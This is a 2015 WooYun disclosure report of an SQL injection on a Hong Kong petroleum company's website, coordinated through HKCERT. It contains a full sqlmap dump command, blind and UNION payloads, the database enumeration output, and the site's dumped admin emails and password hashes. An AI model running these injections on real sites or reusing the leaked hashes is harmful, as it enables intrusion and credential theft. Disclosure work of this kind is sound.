当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146083

漏洞标题:香港百田石油国际集团某处存在SQL注入漏洞(可获得登陆密码)(香港地區)

相关厂商:香港百田石油国际集团有限公司

漏洞作者: 路人甲

提交时间:2015-10-12 01:54

修复时间:2015-11-29 17:36

公开时间:2015-11-29 17:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向核心白帽子及相关领域专家公开
2015-11-04: 细节向普通白帽子公开
2015-11-14: 细节向实习白帽子公开
2015-11-29: 细节向公众公开

简要描述:

香港百田石油国际集团某处存在SQL注入漏洞(可获得登陆密码)

详细说明:

使用sqlmap进行测试;
测试地址:http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional

python sqlmap.py -u "http://**.**.**.**/tips_about.php?news_id=126&pageid=1&Language=traditional" -p news_id --technique=BU --random-agent -D ppig -T admin -C email,id,name,password --dump

漏洞证明:

---
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=126 AND 9637=9637&pageid=1&Language=traditional
Type: UNION query
Title: MySQL UNION query (70) - 22 columns
Payload: news_id=-5621 UNION ALL SELECT 70,70,70,CONCAT(0x71786a7a71,0x6c6a49746c44596a655a,0x716b627171),70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70,70#&pageid=1&Language=traditional
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0
current user: 'ppig@**.**.**.**'
current user is DBA: False


available databases [2]:
[*] information_schema
[*] ppig


Database: ppig
[29 tables]
+---------------+
| user |
| work |
| address |
| admin |
| applications |
| books |
| books_res |
| cat |
| category |
| connect_us |
| counts |
| ext_info |
| gallery |
| gallery_photo |
| jsfw_cat |
| jsfw_news |
| lang |
| member |
| message |
| news |
| product |
| table_down |
| tips |
| tzz_cat |
| unit |
| video |
| xgmy_cat |
| xgmy_news |
| years |
+---------------+


Database: ppig
Table: admin
[5 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| address_id | numeric |
| email | non-numeric |
| id | numeric |
| name | non-numeric |
| password | non-numeric |
+------------+-------------+


Database: ppig
Table: admin
[2 entries]
+-----------------+----+--------+----------------------------------+
| email | id | name | password |
+-----------------+----+--------+----------------------------------+
| admin@localhost | 41 | admin | 759613b741648bd91c42268306c7e140 |
| admin | 52 | hklist | a83f0eb30289b6b99329c1610226b6dd |
+-----------------+----+--------+----------------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-10-15 17:34

厂商回复:

已聯絡相關機構處理

最新状态:

暂无